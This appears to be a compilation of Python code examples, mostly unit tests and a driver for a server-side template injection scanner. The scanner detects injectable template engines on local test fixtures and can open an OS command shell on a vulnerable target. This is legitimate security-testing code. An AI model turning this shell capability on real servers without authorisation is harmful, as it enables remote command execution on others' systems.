Ejemplo n.º 1
    def _on_schedule(self):
        """Event-loop hook, called repeatedly; currently a no-op.

        The bare ``return`` below exits at once, so the sample traffic that
        follows it never executes. It only illustrates how messages are
        pushed to and popped from the connector.
        """
        return

        # Unreachable from here on.
        # The Connector base class translates sender/receiver/stream ids
        # inside _pop_message_to_send() and _push_received_message().
        samples = (
            # incoming private message for the bot
            ('Hi @globot please ask for service #sample', (11, 0, None)),
            # incoming chatroom message for the bot
            ('Hi @globot please ask for service #sample', (60, 0, 777)),
            # incoming chatroom message meant for another agent
            ('Hi folks nothing new today', (11, 60, 777)),
        )
        for text, (first_id, second_id, third_id) in samples:
            self._push_received_message(
                Message.build(text),
                Channel(first_id, second_id, third_id, self.get_name()))

        # outgoing side: pop until the queue reports nothing left
        pending = self._pop_message_to_send()
        while pending is not None:
            message, channel = pending
            pending = self._pop_message_to_send()
Ejemplo n.º 2
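    def test_reflection(self):
        """Run Velocity detection on the local fixture endpoint.

        Passes when ``channel.data`` equals ``self.expected_data`` after
        ``detect()``. The unused ``template`` local was dropped; the URL
        never referenced it.
        """
        channel = Channel({'url': 'http://127.0.0.1:15003/velocity?inj=*'})
        Velocity(channel).detect()
        self.assertEqual(channel.data, self.expected_data)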
Ejemplo n.º 3
    def test_reflection_unsecured(self):
        """Run Twig detection on the local fixture and compare channel.data."""
        # NOTE(review): the method name says "unsecured" but the URL targets
        # the "-secured" page; confirm which fixture is intended.
        target = 'http://127.0.0.1:15002/twig-1.24.1-secured.php?inj=*'
        chan = Channel({'url': target})

        Twig(chan).detect()

        self.assertEqual(chan.data, self.expected_data)
Ejemplo n.º 4
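    def test_reflection_within_text(self):
        """Run Freemarker detection on the local fixture endpoint.

        The ``'os'`` entry is deleted before comparing with
        ``self.expected_data`` (presumably because it depends on the host).
        The unused ``template`` local was dropped: the URL has no ``tpl``
        parameter and never interpolated it.
        """
        channel = Channel({'url': 'http://127.0.0.1:15003/freemarker?inj=*'})
        Freemarker(channel).detect()

        # Raises KeyError if detection did not record an 'os' value.
        del channel.data['os']
        self.assertEqual(channel.data, self.expected_data)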
Ejemplo n.º 5
def main():
    """Command-line entry point: validate the options and start the check.

    The parsed options are turned into a dict; a missing or empty ``url``
    is reported through the parser's ``error()``, otherwise a Channel built
    from the options is handed to ``checks.check_template_injection``.
    """
    options = vars(cliparser.options)

    target_url = options.get('url')
    if not target_url:
        cliparser.parser.error('URL is required. Run with -h for help.')

    channel = Channel(options)
    checks.check_template_injection(channel)
Ejemplo n.º 6
    def test_reflection_context_text(self):
        """Run Jinja2 detection where the tested value sits inside plain text.

        The ``tpl`` parameter carries ``AAAA%sAAAA``; ``'os'`` is removed
        from the result before it is compared with ``self.expected_data``.
        """
        surrounding_text = 'AAAA%sAAAA'
        target = ('http://127.0.0.1:15001/reflect/jinja2?tpl=%s&inj=*'
                  % surrounding_text)

        chan = Channel({'url': target})
        Jinja2(chan).detect()

        # Raises KeyError if detection did not record an 'os' value.
        del chan.data['os']
        self.assertEqual(chan.data, self.expected_data)
Ejemplo n.º 7
    def test_reflection_unsecured(self):
        """Run Smarty detection on the local "unsecured" fixture page.

        ``'os'`` is removed from the result before it is compared with
        ``self.expected_data``.
        """
        target = 'http://127.0.0.1:15002/smarty-3.1.29-unsecured.php?inj=*'
        chan = Channel({'url': target})
        Smarty(chan).detect()

        # Raises KeyError if detection did not record an 'os' value.
        del chan.data['os']
        self.assertEqual(chan.data, self.expected_data)
Ejemplo n.º 8
    def test_no_reflection(self):
        """Detection must record nothing when the URL carries no ``*`` tag.

        The only query parameter is ``inj2=asd2``; after running the Mako
        plugin ``channel.data`` is expected to stay an empty dict.
        """
        settings = {
            'url': 'http://127.0.0.1:15001/reflect/mako?inj2=asd2',
            'force_level': [0, 0],
            'injection_tag': '*',
        }
        chan = Channel(settings)

        detect_template_injection(chan, [Mako])

        self.assertEqual(chan.data, {})
Ejemplo n.º 9
    def test_reflection_secured(self):
        """Run Smarty detection on the local "secured" fixture page.

        The expected result is ``self.expected_data`` without its ``'eval'``
        and ``'exec'`` entries.
        """
        target = 'http://127.0.0.1:15002/smarty-3.1.29-secured.php?inj=*'
        chan = Channel({'url': target})
        Smarty(chan).detect()

        # Work on a copy so the shared fixture is not mutated.
        wanted = self.expected_data.copy()
        for capability in ('eval', 'exec'):
            del wanted[capability]

        self.assertEqual(chan.data, wanted)
Ejemplo n.º 10
    def _get_detection_obj_data(self, url, level=0, closure_level=0):
        """Run ``self.plugin`` detection on *url* and return ``(plugin, data)``.

        ``level`` and ``closure_level`` are passed to the Channel as
        ``force_level``. Any ``'os'`` entry is removed from the returned data
        so the tests stay portable.
        """
        settings = {'url': url, 'force_level': [level, closure_level]}
        chan = Channel(settings)

        detector = self.plugin(chan)
        detector.detect()

        # Portable results: discard the OS entry when one was recorded.
        chan.data.pop('os', None)

        return detector, chan.data
Ejemplo n.º 11
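    def test_header_reflection(self):
        """Run Mako detection with the tested value in the User-Agent header.

        ``'os'`` is removed from the result before it is compared with
        ``self.expected_data``. The unused ``template`` local was dropped.
        """
        channel = Channel({
            'url': 'http://127.0.0.1:15001/header/mako',
            'headers': ['User-Agent: *']
        })
        Mako(channel).detect()

        # Raises KeyError if detection did not record an 'os' value.
        del channel.data['os']
        self.assertEqual(channel.data, self.expected_data)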
Ejemplo n.º 12
    def test_quotes(self):
        """Check that mixed quoting survives ``execute`` and ``execute_blind``.

        The same quoted ``echo`` line is sent through the reflecting and the
        blind Mako fixtures; the first must return ``123"'`` and the second
        must return a truthy value.
        """
        quoted_echo = """echo 1"2"'3'\\"\\'"""

        reflect_chan = Channel({
            'url': 'http://127.0.0.1:15001/reflect/mako?inj=asd',
            'force_level': [0, 0],
            'injection_tag': '*'
        })
        reflect_plugin = detect_template_injection(reflect_chan, [Mako])
        self.assertEqual(reflect_plugin.execute(quoted_echo), """123"'""")

        blind_chan = Channel({
            'url': 'http://127.0.0.1:15001/blind/mako?inj=asd',
            'force_level': [0, 0],
            'injection_tag': '*'
        })
        blind_plugin = detect_template_injection(blind_chan, [Mako])
        self.assertTrue(blind_plugin.execute_blind(quoted_echo))
Ejemplo n.º 13
    def test_reflection_multiple_point_no_tag(self):
        """Run Mako detection on a URL with two parameters and no ``*`` tag.

        ``'os'`` is removed from the result before it is compared with
        ``self.expected_data``.
        """
        settings = {
            'url': 'http://127.0.0.1:15001/reflect/mako?inj=asd&inj2=asd2',
            'force_level': [0, 0],
            'injection_tag': '*',
        }
        chan = Channel(settings)
        detect_template_injection(chan, [Mako])

        # Raises KeyError if detection did not record an 'os' value.
        del chan.data['os']
        self.assertEqual(chan.data, self.expected_data)
Ejemplo n.º 14
    def test_reflection_point_dont_startswith(self):
        """Detection must record nothing when ``inj`` lacks the required prefix.

        The fixture is given ``startswith=thismustexists`` while ``inj`` is
        only the ``*`` tag; ``channel.data`` is expected to stay empty.
        """
        target = ('http://127.0.0.1:15001/startswith/mako'
                  '?inj=*&startswith=thismustexists')
        chan = Channel({
            'url': target,
            'force_level': [0, 0],
            'injection_tag': '*',
        })

        detect_template_injection(chan, [Mako])

        self.assertEqual(chan.data, {})
Ejemplo n.º 15
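    def test_post_reflection(self):
        """Run Mako detection with the tested value in the POST data.

        ``'os'`` is removed from the result before it is compared with
        ``self.expected_data``. The unused ``template`` local was dropped.
        """
        channel = Channel({
            'url': 'http://127.0.0.1:15001/post/mako',
            'post_data': ['inj=*']
        })
        Mako(channel).detect()

        # Raises KeyError if detection did not record an 'os' value.
        del channel.data['os']
        self.assertEqual(channel.data, self.expected_data)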
Ejemplo n.º 16
    def test_reflection(self):
        """Run Mako detection on the reflecting fixture with a bare template.

        ``'os'`` is removed from the result before it is compared with
        ``self.expected_data``.
        """
        bare_template = '%s'
        target = ('http://127.0.0.1:15001/reflect/mako?tpl=%s&inj=*'
                  % bare_template)

        chan = Channel({'url': target})
        Mako(chan).detect()

        # Raises KeyError if detection did not record an 'os' value.
        del chan.data['os']
        self.assertEqual(chan.data, self.expected_data)
Ejemplo n.º 17
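    def test_post_reflection(self):
        """Run Mako detection with the tested value in the request body.

        The body is ``inj=*&othervar=1``. ``'os'`` is removed from the result
        before it is compared with ``self.expected_data``. The unused
        ``template`` local was dropped.
        """
        channel = Channel({
            'url': 'http://127.0.0.1:15001/post/mako',
            'force_level': [0, 0],
            'data': 'inj=*&othervar=1'
        })
        Mako(channel).detect()

        # Raises KeyError if detection did not record an 'os' value.
        del channel.data['os']
        self.assertEqual(channel.data, self.expected_data)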
Ejemplo n.º 18
    def test_reflection_quotes(self):
        """Check how double quotes come back from ``Jinja2.execute``.

        Unescaped quotes are expected to vanish (``12``) and an escaped
        quote is expected to be returned literally (``1"2``).
        """
        chan = Channel({
            'url':
            'http://127.0.0.1:15001/reflect/jinja2?&inj=*',
        })
        plugin = Jinja2(chan)

        cases = (
            ('echo 1"2"', '12'),
            ('echo 1\\"2', '1"2'),
        )
        for command, expected_output in cases:
            self.assertEqual(plugin.execute(command), expected_output)
Ejemplo n.º 19
    def test_reflection_point_startswith(self):
        """Run Mako detection where ``inj`` carries the required prefix.

        ``inj`` is ``thismustexists*`` and the fixture is given
        ``startswith=thismustexists``. ``'os'`` is removed from the result
        before it is compared with ``self.expected_data``.
        """
        target = 'http://127.0.0.1:15001/startswith/mako?inj=thismustexists*&startswith=thismustexists'
        settings = {
            'url': target,
            'force_level': [0, 0],
            'injection_tag': '*',
            'technique': 'R',
        }
        chan = Channel(settings)
        detect_template_injection(chan, [Mako])

        # Raises KeyError if detection did not record an 'os' value.
        del chan.data['os']
        self.assertEqual(chan.data, self.expected_data)
Ejemplo n.º 20
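def checkTemplateInjection(args):
    """Detect the template engine behind *args* and run the requested action.

    A Channel is built from *args* and every entry of ``plugins`` is tried
    in order until one records an ``'engine'`` in ``channel.data``. If none
    does, a fatal message is logged and the function returns.

    After a successful detection:

    * with neither ``os_cmd`` nor ``os_shell`` set, the finding is logged
      (plus a hint when ``channel.data['exec']`` is set);
    * when ``channel.data['exec']`` is set, ``os_cmd`` is run once and its
      output printed, or ``os_shell`` opens an interactive ``Shell``;
    * ``tpl_code`` is passed once to the plugin's ``inject`` and the result
      printed, or ``tpl_shell`` opens an interactive ``MultilineShell``.

    Args:
        args: dict of parsed command-line options.

    Returns:
        None.
    """
    channel = Channel(args)
    current_plugin = None

    # Try the plugins in order and stop at the first detected engine.
    for plugin in plugins:
        current_plugin = plugin(channel)
        current_plugin.detect()

        if channel.data.get('engine'):
            break

    # Stop here when no engine has been found.
    if not channel.data.get('engine'):
        log.fatal(
            """Tested parameters appear to be not injectable. Try to increase '--level' value to perform more tests."""
        )
        return

    # No operating-system action requested: only report the finding.
    if not (args.get('os_cmd') or args.get('os_shell')):
        log.warn("""Tested parameters have been found injectable.""")
        if channel.data.get('exec'):
            log.warn(
                """Try options '--os-cmd' or '--os-shell' to access the underlying operating system."""
            )

    # Operating-system actions, available only when 'exec' was recorded.
    if channel.data.get('exec'):

        if args.get('os_cmd'):
            # Parenthesised single argument: same output under Python 2.
            print(current_plugin.execute(args.get('os_cmd')))
        elif args.get('os_shell'):
            log.warn('Run commands on the operating system.')

            Shell(current_plugin.execute,
                  '%s $ ' % (channel.data.get('os', ''))).cmdloop()

    # Template-code actions.
    if channel.data.get('engine'):

        if args.get('tpl_code'):
            # Pass the template code itself; the original passed
            # args['os_cmd'] here, which is unrelated to this branch.
            print(current_plugin.inject(args.get('tpl_code')))
        elif args.get('tpl_shell'):
            log.warn(
                'Inject multi-line template code. Double empty line to send the data.'
            )

            MultilineShell(current_plugin.inject, '%s $ ' %
                           (channel.data.get('engine', ''))).cmdloop()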
Ejemplo n.º 21
    def test_wrong_auth_reflection(self):
        """Detection must record nothing when the session cookie is wrong.

        The request carries ``Cookie: SID=WRONGSECRET`` to the cookie-auth
        fixture; ``channel.data`` is expected to stay empty.
        """
        settings = {
            'url': 'http://localhost:15001/reflect_cookieauth/mako?inj=asd*',
            'force_level': [0, 0],
            'headers': ['Cookie: SID=WRONGSECRET'],
            'injection_tag': '*',
            'technique': 'R',
        }
        chan = Channel(settings)

        detect_template_injection(chan, [Mako])

        self.assertEqual(chan.data, {})
Ejemplo n.º 22
    def test_url_reflection(self):
        """Run Mako detection with the ``*`` tag inside the URL path.

        ``'os'`` is removed from the result before it is compared with
        ``self.expected_data``.
        """
        settings = {
            'url': 'http://127.0.0.1:15001/url/mako/AA*AA',
            'force_level': [0, 0],
            'injection_tag': '*',
            'technique': 'R',
        }
        chan = Channel(settings)
        detect_template_injection(chan, [Mako])

        # Raises KeyError if detection did not record an 'os' value.
        del chan.data['os']
        self.assertEqual(chan.data, self.expected_data)
Ejemplo n.º 23
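    def test_reflection_multiple_point(self):
        """Run Mako detection on a URL with several ``*``-tagged parameters.

        ``'os'`` is removed from the result before it is compared with
        ``self.expected_data``. The unused ``template`` local was dropped;
        the URL keeps its literal ``tpl=%s`` exactly as before.
        """
        channel = Channel({
            'url': 'http://127.0.0.1:15001/reflect/mako?tpl=%s&asd=1&asd2=*&inj=*&inj2=*&inj3=*',
            'force_level': [0, 0],
            'injection_tag': '*'
        })
        detect_template_injection(channel, [Mako])

        # Raises KeyError if detection did not record an 'os' value.
        del channel.data['os']
        self.assertEqual(channel.data, self.expected_data)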
Ejemplo n.º 24
    def test_reflection_limit(self):
        """Run Mako detection on the ``limit`` fixture.

        Only the ``'render_tag'`` entry of ``self.expected_data`` is expected
        to appear in ``channel.data``.
        """
        bare_template = '%s'
        target = ('http://127.0.0.1:15001/limit/mako?tpl=%s&inj=*'
                  % bare_template)
        chan = Channel({'url': target})

        Mako(chan).detect()

        render_only = {'render_tag': self.expected_data['render_tag']}
        self.assertEqual(chan.data, render_only)
Ejemplo n.º 25
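    def test_custom_injection_tag(self):
        """Run Mako detection with ``~`` configured as the injection tag.

        ``'os'`` is removed from the result before it is compared with
        ``self.expected_data``. The unused ``template`` local was dropped;
        the URL keeps its literal ``tpl=%s`` exactly as before.
        """
        channel = Channel({
            'url': 'http://127.0.0.1:15001/reflect/mako?tpl=%s&inj=~',
            'force_level': [0, 0],
            'injection_tag': '~'
        })
        detect_template_injection(channel, [Mako])

        # Raises KeyError if detection did not record an 'os' value.
        del channel.data['os']
        self.assertEqual(channel.data, self.expected_data)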
Ejemplo n.º 26
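    def test_header_reflection(self):
        """Run Mako detection with the ``*`` tag in the User-Agent header.

        ``'os'`` is removed from the result before it is compared with
        ``self.expected_data``. The unused ``template`` local was dropped.
        """
        channel = Channel({
            'url': 'http://127.0.0.1:15001/header/mako',
            'force_level': [0, 0],
            'headers': ['User-Agent: *'],
            'injection_tag': '*'
        })
        detect_template_injection(channel, [Mako])

        # Raises KeyError if detection did not record an 'os' value.
        del channel.data['os']
        self.assertEqual(channel.data, self.expected_data)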
Ejemplo n.º 27
    def _get_detection_obj_data(self, url, level = 5):
        """Run ``self.plugin`` detection on *url* and return ``(plugin, data)``.

        *level* is written into the plugin's ``channel.args['level']`` before
        ``detect()`` runs. Any ``'os'`` entry is removed from the returned
        data so the tests stay portable.
        """
        chan = Channel({'url': url})

        detector = self.plugin(chan)
        detector.channel.args['level'] = level
        detector.detect()

        # Portable results: discard the OS entry when one was recorded.
        chan.data.pop('os', None)

        return detector, chan.data
Ejemplo n.º 28
    def test_reflection_context_code(self):
        """Run Jinja2 detection where the tested value sits inside ``{{ }}``.

        The expected result is ``self.expected_data`` with ``'prefix'`` and
        ``'suffix'`` set to the values that close and reopen the expression.
        ``'os'`` is removed from the result before comparing.
        """
        code_template = '{{%s}}'
        target = ('http://127.0.0.1:15001/reflect/jinja2?tpl=%s&inj=*'
                  % code_template)
        chan = Channel({'url': target})
        Jinja2(chan).detect()

        # Work on a copy so the shared fixture is not mutated.
        wanted = self.expected_data.copy()
        wanted['prefix'] = '""}}'
        wanted['suffix'] = '{{""'

        # Raises KeyError if detection did not record an 'os' value.
        del chan.data['os']
        self.assertEqual(chan.data, wanted)
Ejemplo n.º 29
    def _get_detection_obj_data(self, url, level = 0, closure_level = 0):
        """Detect with ``self.plugin`` on *url* and return ``(plugin, data)``.

        ``level`` and ``closure_level`` are passed to the Channel as
        ``force_level`` and ``*`` is set as the injection tag. Any ``'os'``
        entry is removed from the returned data so the tests stay portable.
        """
        settings = {
            'url': url,
            'force_level': [level, closure_level],
            'injection_tag': '*',
        }
        chan = Channel(settings)
        detector = detect_template_injection(chan, [self.plugin])

        # Portable results: discard the OS entry when one was recorded.
        chan.data.pop('os', None)

        return detector, chan.data
Ejemplo n.º 30
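    def test_put_reflection(self):
        """Run Mako detection with the ``*`` tag in the body of a PUT request.

        ``'os'`` is removed from the result before it is compared with
        ``self.expected_data``. The unused ``template`` local was dropped.
        """
        channel = Channel({
            'url': 'http://127.0.0.1:15001/put/mako',
            'data': 'inj=*&othervar=1',
            'request': 'PUT',
            'force_level': [0, 0],
            'injection_tag': '*'
        })
        detect_template_injection(channel, [Mako])

        # Raises KeyError if detection did not record an 'os' value.
        del channel.data['os']
        self.assertEqual(channel.data, self.expected_data)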